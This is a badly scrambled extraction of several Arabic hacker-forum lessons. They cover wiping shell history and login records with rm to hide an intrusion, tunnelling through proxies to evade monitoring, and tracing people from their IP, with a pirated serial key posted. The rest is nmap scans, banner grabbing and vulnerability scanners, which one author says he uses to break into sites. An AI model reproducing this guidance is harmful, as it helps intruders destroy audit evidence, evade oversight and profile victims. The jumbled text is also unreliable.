... Operation‬ثم ل بد أن تعلم أن ) ‪( Linux‬هو الصدار المجاني من نظام يونيكس ) ‪ .‬‬ ‫‪96‬‬ ..‬‬ ‫القسم الثاني ‪ :‬يتعلق باتصالك وحماية خصوصياتك ‪ ...‬وهذا يقف عن قدرات كل شخص فينا ‪...‬أوًل لبد أن تعلم أن من أهم‬ ‫خواص يونكس التي تمنحه القوة ‪ ...‬‬ ‫القسم الول ‪ :‬يخص ملفات النظام التي يسجل فيه اجراءاتك ‪( LOG File ) .‫"بين حماية الخصوصية وإزالة الثارمن ملفات الـ ‪"Logs‬‬ ‫>منقول من منتديات الحزم السلمية<‬ ‫>الكاتب‪ :‬حزم الظامي<‬ ‫فيما يتعلق بموضوع التخفي ومنع تعقب الثر مع سيرفرات يونكس أو لينوكس ‪ ... ( Unix‬يعني‬ ‫الفضل فهم يونيكس فحتمًا ستتعامل مع لينوكس بكل ارتياح كونك تتعامل مع ‪Unix‬‬ ‫أوًل أريد أقسم الموضوع لقسمين رئيسين ‪:‬‬ ‫ساتكلم عن كل واحد منهما بعجاله لن الموضوع ما تكفي ساعات معدودة لكتابة كل شيء عنه ‪ ..‬‬ ‫‪ .‬تقوم على تعدد المستخدمين ‪Unix Multi-User Mode ...‬بل وال‬ ‫اتوقع ان عمر ابن ادم يفنى وهو يبحث عن المن على النترنت وكل ما تقدم مستواه كل ما اصبح يعي تمامًا‬ ‫كل ما حوله وما يجب ان يقوم به من اجل التخفي ومنع تعقب الثر ‪...‬‬ ‫في الواقع جميع الجهزة في انترنت تجمع المعلومات عنك ‪ ،‬ابسطها مثل عنوان ال ‪ IP‬و اكثرها حساسية‬ ‫مثل اسمك و رقم الهاتف الخاص بك ربما و عنوانك البريدي ‪ .‬ملفاتك و جهاز كومبيوترك محمي‬ ‫بصورة جيدة للغاية لو ارتبط بانترنت بواسطة نظام التشغيل فقط و بدون استخدام برمجيات اضافية‪ ،‬ولكن‬ ‫حتى ولو حصل ذلك ففي غضون السابيع القليلة الولى سيفقد الجهاز الكثير من اجزاء حمايته نتيجة‬ ‫للستخدام الغير سليم لنترنت تتابع الشركات نظم التشغيل بشدة‪ ،‬الكل يتابع الثغرات في ‪Microsoft‬‬ ‫‪ Windows‬و ‪ Linux‬و ‪ Mac‬و غيرهما ‪ ،‬لذلك من الصعب الوصول الى تلك الجهزة بصورة فورية و‬ ‫بدون تدخل رسمي ‪....

.‬‬ ‫وتسمى سجل الحداث كما تسمى ملفات سجل الداء‬ ‫جل جميع مزّودات الويب )‪ (Web servers‬معلومات واسعة عن حركة الوصول إلى موقعك‪ ،‬ضمن‬ ‫تس ّ‬ ‫ملفات سجل الداء )‪ ،(log files‬وهي عبارة عن ملفات نصوص بسيطة تلتقط نشاطات الكمبيوتر المزّود‪.‬وتختلف الجراءات المنية‬ ‫من نظام لخر حسب قدرات مدير النظام الذي تعمل عليه ‪.‬‬ ‫القسم الول ‪ :‬يخص ملفات النظام التي يسجل فيه اجراءاتك ‪..‬لكن إذا زاد حجم‬ ‫ملف سجل الداء )‪ (log file‬عن بضعة كيلو بايتات‪ ،‬فإن التحليل اليدوي يصبح غير عملي‪ ،‬إن لم يكن‬ ‫ل كليًا‪ .‬وإذا أخذت بعين العتبار أن مزّودات اليوم توّلد ملفات لسجل الداء‪ ،‬يصل حجمها إلى‬ ‫مستحي ً‬ ‫ميجابايتات كثيرة‪ ،‬بل ويصل في كثير من الحيان إلى جيجابايت أو أكثر‪ ،‬لدركت ببساطة أن التحليل اليدوي‬ ‫غير وارد إطلقًا‪.‬‬ ‫ما يتعلق بملفات التسجيل لجراءاتك تسمى ) ‪ .‬‬ ‫‪97‬‬ .‬‬ ‫ملفات سجل الداء‬ ‫تبعًا لمزّود الويب الذي تستخدمه‪ ،‬تحتوي ملفات سجل الداء‪ ،‬على بعض‪-‬ومن المحتمل جميع‪-‬المعلومات‬ ‫التالية‪ ،‬لكل زيارة يقوم بها زائر إلى موقعك‪:‬‬ ‫وأريد أخبرك ان ثمة ملفات ل يمكنك الووصول لها وهي تراقب كل اجراءاتك ‪ ... ( LOG File‬مؤرخه بالوقت والجراء ‪.‫والحقيقة انا لزلت في بداية طريقي لهذا المجال واسال ال ان يسهل ويفتح علينا من فضله ‪...‬‬ ‫ويمكن تحليل معلومات سجل الداء يدويًا‪ ،‬وهذا ما كان يفعله الناس‪ ،‬في بدايات شبكة ويب‪ ..

‬‬ ‫هنا راح تسجل جميع الوامر التي نفذتها‬ ‫‪contactemail.‬‬ ‫هو كوني حذفت ملفي ‪lastlogin & .bash_history‬‬ ‫‪rm .‫اقتباس‪:‬‬ ‫عموما أخوي هيكس تكلم عن هذه الملفات في نظام ‪.‬‬ ‫طيب وش الحل ننسفها نهائيًا وما نريد أوامر الحذف تظهر ‪.‬هو اليبي الذي دخلت به اخر مره ‪.‬‬ ‫بدايته بنقطه مما يعني انه ملف مخفي فاي ملف أو مجلد يبدا بنقطه اذا هو مخفي مباشرة في يوينيكس ‪...‬هي استخدام الشل النصي وهذا رأيي فأنا إلى الن اعيش‬ ‫في ذهول من قدرات هذا النظام العجوز ‪ . etc‬‬ ‫هنا مشكلة ربما يعرفها البعض ‪..‬هي كالتالي ‪:‬‬ ‫‪lastlogin..‬يكفي ان الدوس صاحب المكانيات والسهولة ‪ .‬وسرعة التنفيذ‬ ‫والستجابه هو في الصل جزء أو أداة من أدوات يونيكس وعملت مايكروسوفت على تطويرها وال فالصل‬ ‫هو يونكس بل ادني شك ‪.‬‬ ‫عموما أهم الملفات حاليًا أريدك تحذفها كل ما تستخدم الشل النصي ‪ .‬‬ ‫وهذا الملف يسجل به اخر ايبي سجل الدخول ‪.‬‬ ‫‪bash_history..‬‬ ‫وانا الن راح اخبرك عن اهمها ول يشترط ان تزيل كل شي ‪:‬‬ ‫) فما ل يدرك كله ل يترك جله ( ودائمًا حتى ل تحبط ) إذا لم تستطع شيئًا فدعه وجاوزه إلى ما تستطيع (‬ ‫عموما الطريقه المثلى للتعامل مع انظمة يونكس ‪ ....‬وللعلم يا أخون هناك اعدادت جباره في اليونكس تمكنك من‬ ‫البداع ومن التجديد والبتكار ‪..‬‬ ‫الطريقة تستخدم ‪ cpanel‬هو أفضل إجراء ‪ .... WIN NT‬‬ ‫وكيف يتم إزالة اللوق فايل ويمكن الرجوع لدرسه ‪.‬ويا حبذا تنسف معهم مجلد ‪.‬‬ ‫واذا مد ال في‬ ‫لحظ هذه الصورة ‪ :‬وهي من سي بانل مش فوتوشوب وبنفس الطريقة تتحكم في السيرفر بل اي معلومات‬ ‫عن المصدر الحقيقي للتصال ‪...bash_history.‬‬ ‫باستخدام المر ‪ rm‬تلقائيًا راح يكون ناتج هذا الجراء تجدد ملف الباش ‪bash_history.‬‬ ‫ليصبح محتواه ‪:‬‬ ‫‪rm ....‬‬ ‫اذا ما كنت تستخدم الشل النصي للتعامل مع البريد‬ ‫أيضًا أريد منك حذف هذين المجلدين‬ ‫‪ Tmp‬والخر ‪ trash..bash_history‬‬ ‫وراح يكون ناتج ملف ‪ lastlogin.‬‬ ‫عموما أخواني للعلم حتى يمكنك اللعب بالنظام كامل باليبي المحلي ‪localhost :‬‬ ‫العمر تكلمنا عن هذا الموضوع باذن ال ‪.‬‬ ‫‪98‬‬ .

‬‬ ‫‪ Web Proxy Service (1‬وهذا للتصفح ‪.‫عموما سأعود لهذا الموضوع اذا مد ال بالعمر وال اني اعمل من اشهر على كتابة دروس نظرية وتطبيق‬ ‫عملي لحتراف يونيكس ‪.‬‬ ‫وراح نكمل الحديث عن ملفات اللوق وحذفها حتى وإن لم يكن مسموح لك بملكيات ‪ ...‬‬ ‫‪99‬‬ ... LDAP.‬‬ ‫‪ WinSock Proxy Service (2‬وهذا مفيد مع سيرفرات ‪ windows NT‬ويفيد في عملها على‬ ‫اخفاء هويتك عند العمل على بروتوكولت ‪ telnet‬أو ‪ FTP‬وهذا هو البروتوكول ‪WinSock‬‬ ‫‪..‬ومواصفاتها وعناوينها الخاصة ‪... Socks Proxy Service (3‬وهذا القوى ويستفاد منه في )‪SSL) Secure Sockets‬‬ ‫‪ Layers‬بالضافة إلى )‪ IIS) Internet Information Server‬ويخدم مع ‪Windows NT‬‬ ‫وكذلك ‪ FTP ، Telnet، Gopher،IRC ، RealAudio ، POP3‬وهذا النوع يجمع بين كونه‬ ‫‪ firewall‬إضافة إلى خدمة أمنية ‪ .‬‬ ‫ويتميز هذا النوع بالمان ‪..‬‬ ‫وبالمقابل يتم مراقبة نظام ‪ UNIX‬عن طريق الرواتر ‪ Router .. DNS lookup..‬وهذا يقف عن قدرات كل شخص فينا ‪...... HTTP Protocol .....‬‬ ‫القسم الثاني ‪ :‬يتعلق باتصالك وحماية خصوصياتك ‪ .‬وتكمن وظيفته في تغيير معلومات موارد خدمة النترنت‬ ‫التي تتصل بها ‪ .... ( Router‬الول ‪ :‬إستاتيكي يتطلب من مدير الشبكة ضبط يدوي ‪.‬‬ ‫ننتقل للجزء الخر ‪.‬‬ ‫وهنا نوعين للموجهات أو الموزعات )‪ .‬وهي كثر جدًا ‪:‬‬ ‫‪ Ping، Traceroute.. Protocol‬‬ ‫‪ ........‬وعادة ما يستخدم فيها بروتوكول ‪ TCP/IP‬ويستخدم هذا البروتوكول وسيلتين للتصال‬ ‫‪:‬‬ ‫* طريقة المنظمة العالمية )‪(Internationa Organization for Standardization‬‬ ‫** مجموعة بروتوكولت للتصالت ‪ .. Finger. SNMP‬وهذا يكون باعتبار‬ ‫النظام واعتبار بروتوكول التصال الذي يستخدمه نظام ‪ .‬أنك تستخدم بروكسيات السوكس ‪ ... SOCKS Protocol‬فيجب عليك‬ ‫إيجاد ارقام سوكس لستخدامها حماية لخصوصيتك أو عند الحاجة للتخفي اناء عملك على النظام ‪. securiy .‬وضعتها وزارة الدفاع المريكية ‪ransmission Control .. WIN NT :‬ويستفيد من وتوكول ‪TCP/IP‬‬ ‫لمراقبة النظام ‪. Protocol TC‬‬ ‫الحقيقة أخواني هناك أمر هام جدًا وهو أن ثمة برامج تساعدك كثيرًا بتقنياتها المحترفة تساعدك في التخفي‬ ‫من تقنيات الرقابة التي ل يخلوا منها نظام ‪ ...‬وهو أداة فعاله لتشخيص النظام ونعني‬ ‫بهذا المصطلح أي الموجه أو الموزع ويتميز الراوتر بقدرته على التعرف على كل جزء من أجزاء الشبكة‬ ‫ويعمل عى مراقبة الداء وموازنة سير البيانات ويسمح للشبكات المتصلة بالحفاظ على استقلليتها‬ ‫‪.‬فوال تستطيع‬ ‫الحذف ‪.. Whois.‬وان‬ ‫سهل ال ‪ .‬‬ ‫عموما البروكسيات في مجملها ثلثة أنواع ‪..‬‬ ‫‪.‬اشتغل ببروكسي يعمل مع بروتوكولت التصفح )‪ ( HTTP Protocol‬ويجب أن ندرك أنك‬ ‫حين تتعامل مع نظام يونيكس أو النظمة الخرى الشبيهه‬ ‫والحقيقة ان كونك تستخدم البروكسيات المعتاده للتصفح فهذا ل يخفي هويتك اذا استخدمت بروتوكولت‬ ‫‪ HTTP‬ولكن الحل المثل ‪ .‬‬ ‫أخوي الحقيقة المشكلة أن الغلب منا يستخدم إما نفس البروكسي لمستضيف الخدمه اللي يستخدمه ‪ ..

.‬ويحتاج الى ضبط بسيط وهو أقل أمانًا من الول ‪..‬وعليكم بمراقبة هذه البورتات ‪:‬‬ ‫‪Port 21 = FTP‬‬ ‫‪Port 23 = Telnet‬‬ ‫‪Port 25 = SMTP‬‬ ‫‪Port 53 = DNS‬‬ ‫‪Port 79 = Finger‬‬ ‫‪Port 80 = HTTP‬‬ ‫‪Port 110 = POP3‬‬ ‫‪Port 111 = SunRPC‬‬ ‫‪Port 139 = NetBIOS‬‬ ‫‪Port 443 = SSL‬‬ ‫‪Port 1080 = SOCKS‬‬ ‫‪Port 8181 = IMail‬‬ ‫والحقيقة الفضل من هذا كله أن تسجل دخولك باليبي المحلي أو لبد أن تستخدم بروكسيات من نوع سوكس‬ ‫‪.‬‬ ‫بل وستخدم ايضًا بروتوكول ‪ SOCKS‬ويقوم بدوره خير قيام فهو يخفي هويتك ول يمكن حتى لمسؤول‬ ‫الشبكة المحلية معرفة نشاطك ناهيك عن هويتك ‪.‬عموما إخواني بالنسبة للتصال ‪ ...‬ببرامج أو بدون ‪ .‬يقوم بأعماله اتوماتيكيًا ‪...‫والثاني ديناميكي ‪ ..‬‬ ‫وهنا ايضاحات لبعض الخدمات التي يؤديها البرنامج ؟‬ ‫‪100‬‬ ..‬‬ ‫وكما ذكرنا فان برنامج ‪ HTTPort‬بطريقة عمله يحقق حرية التصفح في شبكة النترنت وإخفاء هوية‬ ‫المستخدم ‪.‬‬ ‫وهناك برامج جيدة كالتالي ‪ :‬أفضلها في نظري أداءًا وسهولة ‪ ...‬برنامج ‪ HTTPort‬ومعروف لديكم أكيد ‪...‬أنا أقول لكم عليكم‬ ‫بتشفير أو إخفاء أو تزوير بياناتكم باي طريقة ‪ .‬‬ ‫عموما انا اسف ربما تفرعت في هذا الموضوع ‪ .‬‬ ‫صورة للبرنامج اناء عمله ‪..‬‬ ‫تقنية حديثة مرتبطة ببروتوكول التصال ‪ TCP/IP‬الخاص بشبكة النترنت‪ ،‬فقد صمم برنامج ‪HTTPort‬‬ ‫من أجل إخفاء الهوية الحقيقية عن الخرين وأيضا يتخطى المرشح(البروكسي ‪) Proxy Server‬التابع‬ ‫لمزود الخدمة ‪ ISP‬وأشبه ما يوصف بأنه برنامج يشغل برامج النترنت من تحت نفق وهمي يتجاوز‬ ‫الحواجز المنية )المرشح ) ‪ Proxy‬وليرتبط مع بروكسي آخر‪.

101 .

102 .

103 .

104 .

. ‫ كيلو بايت إل أنه يخدم أكبر من حجمه بكثير جدًا‬18 ‫وهناك برنامج صغير ل يتعدى حجمه‬ AnalogX Proxy HTTP (web). Microsoft !Messenger. : ‫فهو يدعم كل هذا‬ SMTP (send mail). and many more http://www. so will not require any modification for most users.exe PortBlocker : ‫ويدعمه برنامج آخر اسمه‬ ‫يساهم في حماية البورتات التي تستخدمه في تصفحك أو نقلك للملفات أو غيرهما من ان تستخدم في مراقبة‬ : ‫تحركاتك وتسجيل معلوماتك‬ PortBlocker is configured to block the most common types of servers that might be on a system (FTP. etc).and have them blocked and/or logged Log unauthorized port access attempts and secure internal servers from .. then you can easily add it's ports (either TCP or UDP) to it's list.. HTTP.. POP3 (recieve mail). AOL Instant Messenger.analogx. FTP (file transfer).. Netscape. If you are running a special server of some sort. and Socks4/4a and partial Socks5 (no UDP) protocols! It works great with Internet Explorer. .‫ سواءًا كان الفعلي أو‬. AOL.com/files/proxyi.. ‫هذا بالضافة إلى أن المتصفح اكسبلورر يسمح لك باضافة بيانات مزود الخدمة‬ ( Anonymous) ‫وهمي للتخفي‬ : ‫ واسمه‬. NNTP (newsgroups). HTTPS (secure web).internet access easily 105 .

...mechanicalminds. Gopher. and Socks protocols‬‬ ‫‪106‬‬ .com/files/pblocki.‬لني متأكد ان الكم الهائل‬ ‫من المعلومات المرسلة والتقارير عنك وعن غيرك منتظمة وخفية ولكن آن لها أن تفضح ‪.com/software/pla/pla.‫حمل من هنا برنامج ‪PortBlocker‬‬ ‫‪http://www.exe‬‬ ‫‪ZIP archive instructions 818 kb‬‬ ‫‪http://www. FTP.mechanicalminds..com/software/pla/setup.‬‬ ‫اسم البرنامج ‪Proxy Log Analyzer :‬‬ ‫صورة ‪:‬‬ ‫للتحميل ‪ MB 1..zip‬‬ ‫ناهيك عن أن المتصفح يسمح لك بتعبئة البيانات كما تحب ‪.‬‬ ‫بالطبع كلكم تعلمون أن مايكروسوفت معروفة بطبعها التجسسي ‪.‬‬ ‫‪.‬‬ ‫‪Provides a space for you to type the address and port number of the‬‬ ‫‪proxy server you want to use to gain access to the Internet over HTTP..analogx.exe‬‬ ‫والحقيقة أحمد ال الذي ذكرني بهذا البرنامج المميز وهو الذي يوضح لك كل المعلومات التي سجلت‬ ‫لمراقبتك أناء عملك على نظامك ‪.Secure.‬‬ ‫فأقدم لكم هذا البرنامج لكي تعرفوا كل ما تم تسجيله عنكم ول تنسوني من دعوة ‪ .07 :‬بدون ضغط‬ ‫‪http://www.

‫فقط استخدام العدادت المتقدمة للتصال ‪:‬‬ ‫حتى اليبي بالماسنجر بامكانك ترسل كل ملفاتك بل حصول أي انسان على اليبي الحقيقي لك ‪..‬اذهب افتح الماسنجر من قائمة ادوات خذ خيارات ‪..‬‬ ‫والطريقة سهله ‪ .‬‬ ‫‪107‬‬ .

.‬‬ ‫‪-----------------------‬‬‫وصلة التحميل‬ ‫‪-----------------------‬‬‫‪http://www.....zip‬‬ ‫‪-----------------------‬‬‫الشرح‪:‬‬ ‫‪------------------------‬‬‫الشرح قام بشرحه أخي العزيز‬ ‫‪FAHAD‬‬ ‫ال يخليه ماخلى شي من خبراته إل وطرحه‬ ‫نــقـــــول بســــم ال‬ ‫الشكل الول‬ ‫‪108‬‬ .‫انتهى‪،،،‬‬ ‫"برنامج ‪ HTTP Port‬الذي يجعلك تتصفح النت متخفيا!!"‬ ‫>ةةةةة ةة ةةةةة ةةة ةةة<‬ ‫>ةةةةةة‪:‬ةةةةةة<‬ ‫اسم البرنامج‪:‬‬ ‫‪-----------------------‬‬‫‪HTTPort 3snf‬‬ ‫‪-----------------------‬‬‫الوظيفة‪:‬‬ ‫‪-----------------------‬‬‫برنامج لتصفح بسرية وأمان‬ ‫في النترنت‬ ‫ويريحك من البروكسيات الرقمية‬ ‫ومن البحث عنها‬ ‫‪.....com/tv2/ssdd63/httport3snf..angelfire..

‫واجهة البرنامج الرئيسية أضغط على الختيار الثالث فوق‬ ‫‪Port mapping‬‬ ‫الشكل الثاني‬ ‫أضغط على الختيار ‪Add‬‬ ‫سوف تضاف قائمة مثل التي في الشكل أسمها‬ ‫‪New mapping‬‬ ‫لين الحين كل شي تمام‬ ‫الشكل الثالث‬ ‫‪109‬‬ .

net‬‬ ‫‪Remote port : 3128‬‬ ‫‪OKY MAN‬‬ ‫الشكل الرابع‬ ‫الن عد للختيار الثاني فوق ‪Proxy‬‬ ‫واكتب مكان الرقم واحد البروكسي الصلي لشتراكك‬ ‫سمعت ‪ .‬الصلي‬ ‫‪110‬‬ .‫هنا ياطويل العمر تكتب نفس الكلم والرقام المكتوبة زي كذا‬ ‫‪Local port : 80‬‬ ‫‪Remote host : webcache...bt.

0.1‬‬ ‫والمنفذ ‪80‬‬ ‫والحين روح للمتصفح وأدهر بكيفك‬ ‫وكيف نفسك بنفسك وما عليك رقيب إل ال عزوجل‪.‬‬ ‫انتهى‪،،،‬‬ ‫‪111‬‬ ..‫ومكان الرقم أثنين المنفذ‬ ‫وفي الخير ضغطه قوية على الزر‬ ‫‪Start‬‬ ‫ماخلصنا بقى الخطوة الخيرة‬ ‫الشكل الخامس‬ ‫من خيارات النترنت‬ ‫ضع البروكسي ‪127.0.

.‬‬ ‫هاذا برنامج ممتاز للكشف عن معلومات الشخص و بلده و كل شيء بس بمجرد معرفة اليبي ماله ‪ ...‬‬ ‫اسم البرنامج ‪.‬‬ ‫‪http://www.exe‬‬ ‫‪112‬‬ .neoworx.com/download/NTX325.‫" شرح برنامج ‪" NeoTrace‬‬ ‫>ةةةةة<‬ ‫>ةةةةةة‪< DarK_HaCKeR :‬‬ ‫برنامج يكشف كل شي عن صاحب اليبي‬ ‫مرحبا شباب ‪...‬او تريد‬ ‫تعرف معلومات عن موقع معين ‪.‬‬ ‫‪Neo Trace Express‬‬ ‫اتفضلوا الوصلة ‪.

113 .

‫اتمنى ان الشرح وافي وهذا هو السيريل نمبر ‪:‬‬ ‫‪XDQG-2ZKN-X2PA-KTRQ‬‬ ‫انتهى‪،،،‬‬ ‫‪114‬‬ .

80‬‬ ‫ألحين نتصل على المنفذ ‪ 80‬عن طريق ‪ Telnet‬وبعدين نكتب المر التالي‬ ‫‪GET /qwe HTTP/1.‫" كيفية القيام بجمع المعلومات عن موقع أو شبكة "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةة<‬ ‫طرق جمع المعلومات لي موقع أو سيرفر أو شبكة أيا كانت ‪:‬‬ ‫=)الطريقة الولى(=‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫وهي من خلل زيارة موقع‬ ‫‪/http://www.com‬‬ ‫وبعد ارسال رسالة ليميل وهمي راح تستقبل رد ولما تعرض الـ ‪ Headers‬الخاص بالرسالة راح تلقي‬ ‫معلومات عن الموقع‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫=)الطريقة الثالثة(=‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫الـ ‪Banners‬‬ ‫ماهو البانر؟‬ ‫البانر وباختصار شديد هي الرسائل التي تأتيك عندما تنفذ أمر ما يعني الرد‪.com‬‬ ‫وتكتب الموقع هناك وراح يعرض لك معلومات تفيدك كثير‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫=)الطريقة الثانية(=‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫وهي قديمة تستخدم حديثا لكني لادري مدى عملها ولنفرض الموقع الي نبي نجيب معلومات عنه هو‬ ‫‪/http://www.1‬‬ ‫تقوم بتنفيذه ‪.0.kjgk'dgjbumpipt@almodammer..0.‬‬ ‫وكيف راح نستغلها في كشف معلومات الموقع؟‬ ‫عن طريقة أداة ‪ Telnet Client‬عميل التلنت والطريقة هي أن تقوم بالتصال بأحد المنافذ سواء كان‬ ‫‪FTP 21‬‬ ‫أو‬ ‫‪TELNET 23‬‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫=)الطريقة الرابعة(=‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫وهي ‪HTTP‬‬ ‫‪Hyper Text Transfer Protocol‬‬ ‫ويعمل على المنفذ ‪8080 .1 HTTP/1.‬‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫‪115‬‬ .almodammer..1‬‬ ‫بعد كذا راح يخبرنا البانر بوجود صفحات الخطأ ‪400‬‬ ‫وراح تجيك معلومات هائلة عن الهدف‬ ‫وفيه عندك امر ثاني وهو‪:‬‬ ‫‪HEAD 127.netcraft.com‬‬ ‫نقوم بإرسال رسالة ليميل وهمي وغير موجود مثل‬ ‫‪dfl..

x Intel 64‬‬ ‫‪Solaris 8 Intel/Spar 64‬‬ ‫‪Solaris 2..‬الخ(‬ ‫=============‬ ‫‪( Shadow Sceurity Scanner‬من أفضل برامج البحث عن المنافذ والتطبيقات والعمليات ومعظم‬ ‫‪116‬‬ .x Intel/Sparc 255‬‬ ‫وقد يحدث اختلف في القيم حيث يكون الفرق يساوي واحد‬ ‫أي‪ :‬عند مرور ‪) data list or packet‬حزم او قائمة بيانات( بـ ‪ Nodes‬حيث أن ‪ TTL‬تنقص بـ ‪1‬‬ ‫لذلك عليك ان تستعمل أمر ‪ tracert‬في الويندوز أما ‪ traceroute‬فهو خاص باليونكس‬ ‫وهو امر خاص بعرض معلومات عن الشخص أو الموقع‬ ‫ويمكننا استخدامه بهذه الطريقة‬ ‫‪tracert ip‬‬ ‫‪ =ip‬عنوان الموقع أو السخص‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫=)الطريقة السادسة(=‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫عن طريقة الدوات والبرامج‬ ‫أول ‪ Windows‬لنه السهل‬ ‫يمكنك تحديد معلومات عن الموقع والسيرفر او المنافذ المفتوحة من قبل تطبيق اي برنامج ويمكنك استغلل‬ ‫المنافذ بكثير من عمليات الختراق وسوف نطرق لها في الدرس الثاني‬ ‫تعرفون ان الويندوز مليان برامج لكن تعرفون ان مو كل برنامج مثل أي برنامج عشان كذا راح اذكر الفضل‬ ‫‪:‬‬ ‫‪) N-Stealth‬لتحديد معلومات عن الشبكة منها المنفذ ثغرات ‪.3 STRATUS 64‬‬ ‫‪SCO R5 Compaq 64‬‬ ‫‪Netware 4.x SGI 60‬‬ ‫‪FreeBSD 3.x IBM/RS6000 60‬‬ ‫‪AIX 4.2.2.2 7507 60‬‬ ‫‪Cisco 12.x IBM/RS6000 60‬‬ ‫‪Cisco 11.3.0 Alpha 60‬‬ ‫‪Unisys x Mainframe 64‬‬ ‫‪Linux 2..x Intel 64‬‬ ‫‪FTX(UNIX) 3.0 2514 255‬‬ ‫‪IRIX 6.x Intel 64‬‬ ‫‪OpenBSD 2.11 Intel 128‬‬ ‫‪AIX 4.‫=)الطريقة الخامسة(=‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫وهي من أمر ‪ ping‬الذي يقوم بإرسال عدة طلبات للـ ‪ ip‬أو للموقع ويقوم باستقبال الردود وبسرعة هائلة‬ ‫الحين كيف نستفيد منها في تحديد معلومات للموقع !‬ ‫حيث تقوم بوضع التالي‬ ‫‪ping ipsite‬‬ ‫‪ =ipsite‬الي بي الخاص بالموقع‬ ‫وراح يطلعلك عدة اسطر حنا مايهمنا ال كلمة‬ ‫‪TTL=XXX‬‬ ‫‪=XXX‬القيمة والعدد الي طلعلك‬ ‫بتقولي وش فايدته أقولك من خلله يمكن تحديد نظام التشغيل وهذي امثلة‪:‬‬ ‫‪Windows 9x/NT Intel 32‬‬ ‫‪Windows 9x/NT Intel 128‬‬ ‫‪Windows 2000 Intel 128‬‬ ‫‪DigitalUnix 4.

* (sT TCP connect() port scan (default for unprivileged userssU UDP port scan. or Null scan (experts only.my.-sN Stealth FIN.1080. ‫منها المنافذ والصدار والملقم والسيرفر‬ ^^^^^^^^^^^^^^^^^^^ =(‫=(الطريقة السابعة‬ 117 .* T General timing policyn/-R Never do DNS resolution/Always resolve [default: sometimes[resolve oN/-oX/-oG Output normal/XML/grepable scan logs toiL Get targets from file.* 'p ports to scan...com ‫وراح يعرض لك معلومات هائلة تفوق معلومات برامج وأدوات ويندوز‬ ..com ‫=الموقع المراد فحصه‬almodammer.. 3.decoy2[. Use '-' for stdinS /-e Specify source address or network interface..31337F Only scans ports listed in nmap-services.6666..-sX.0. Xmas.‫ الخاص بالبرنامج‬man page ‫ولخلفية ومعلومات اكثر قم بالذهاب إلى‬ ‫لنشرح أهم أمر وهو‬ nmap -sS -O -vv almodammer..* (interactive Go into interactive mode (then press h for help-Example: nmap -v -sS -O http://www.com/ 192. DESCRIPTIONS. Example range: '1-1024.com/ and(others Ddecoy_host1.* (sP ping scan (Find any reachable machines(sF. AND EXAMPLES !!!!!!!!! ‫وأيضا يحتوي العديد من الوامر المجهولة‬ .] Hide scan using many decoys.* (sR/-I RPC/Identd scan (use with other scan types:(Some Common Options (none are required.(‫الثغرات مع وجود شرح لكيفية علجها‬ ============= ‫ (برنامجي المفضل فأنا استخدمه لختراق المواقع والجهزة حيث يساعدني كثيرا في معرفة‬SuperScan (‫ كبيرة يمنك الضافة عليها كيفما شئت‬List ‫المنافذ المفتوح بالموقع والجهزة ويحتوي على‬ ------------------------------------------------------------------------Linux ‫الحين نجي على‬ ‫هو برنامج واحد مفضل وأكثر مستخدمين ليونكس يشهدون بجدارته والذي يحمل اسم‬ Nmap (‫ )مستكشف الشبكات‬Network Maper ‫اختصار لـ‬ ‫ وهو خاص للمتهمين‬Linux ‫وطبعا يفوق كل ادوات ويندوز وطرق ويندوز علشان كذا دائما ينصح بـ‬ ‫السيرفرات‬/‫المواقع‬/‫باختراق الشبكات‬ : ‫كيفية استمعاله‬ /‫ وراح تجد الكثير من الوامر الذي ظهرت مثل‬nmap ‫شغل‬ [l] Nmap V.00 Usage: nmap [Scan Type(s)] [Options] (Some Common Scan Types ('*' options require root privileges ((sS TCP SYN stealth port scan (default if privileged (root.90 SEE THE MAN PAGE FOR MANY MORE OPTIONS.88'*.168.0/16 '192.. Its use is recommended. most can be combined O Use TCP/IP fingerprinting to guess remote operating system.. Use twice for greater effectP0 Don't ping hosts (needed to scan http://www.microsoft.*..v Verbose.

...‫^^^^^^^^^^^^^^^^^^^‬ ‫تعتمد على وجود جهازك ‪ Linux‬أو ‪ Shell Account‬حتى تقدر تطبق اوامر اليونكس في الويندوز لكن‬ ‫لو تركب ‪ Linux‬أفضل لن ‪ Shell‬لزم يكون ممتاز وسعره مناسب علشان كذا لتتعب نفسك وركب‬ ‫‪ Linux‬وارتاح‬ ‫المهم هذا أمر ‪whois‬‬ ‫والي يوفره لنا ‪ Linux‬والويندوز كبرامج كبيرة وثقيلة وغير دقيقة‬ ‫ولمعلومات أكثر اضف المر‬ ‫‪man whois‬‬ ‫‪------------------------------------------------------------------‬‬‫أما عن طريق الويندوز فيمكنك البحث في ‪google‬‬ ‫‪http://www...google......‬‬ ‫انتهى‪،،،‬‬ ‫‪118‬‬ ...com/search?q=whois&btnG=Google+Search‬‬ ‫والكثير من المواقع تقدم هذي الخدمة وهي سكربتات و ‪ cgi‬تقوم بالبحث عن الموقع بإحدى الطرق التي‬ ‫ذكرتها مع اختلف بسيط وهي شبيهة بموقع ‪ netcraft‬الطريقة الولى‪..

XXX.com‬‬ ‫لنه سيضع من عنده ‪ /‬عند تطبيق الثغره‬ ‫‪ 2‬اسم ملف الثغرات‬ ‫‪ 3‬لتغيير ملف الثغرات إلى ملف آخر‬ ‫‪ 4‬الثغرات الموجوده في الملف‬ ‫‪119‬‬ .‫" برنامج عمران سكان للبحث عن الثغرات "‬ ‫>ةةةةة ةة ةةةة ةةةةةةةةةة<‬ ‫>ةةةةةة‪>P @ LH@CKERZ :‬‬ ‫برنامج عمران سكان يعتبر من أفضل برامج كشف الثغرات و ذلك لما يتميز به من سرعه سهولة في تغيير‬ ‫‪.‬ملف الثغرات‬ ‫‪ 1‬اسم الموقع المراد البحث عن ثغرات فيه‬ ‫و ل تنسى ‪//:http‬‬ ‫ملحظه ‪:‬‬ ‫ل تضع \ في نهايه الموقع مثل‬ ‫‪/http://www.

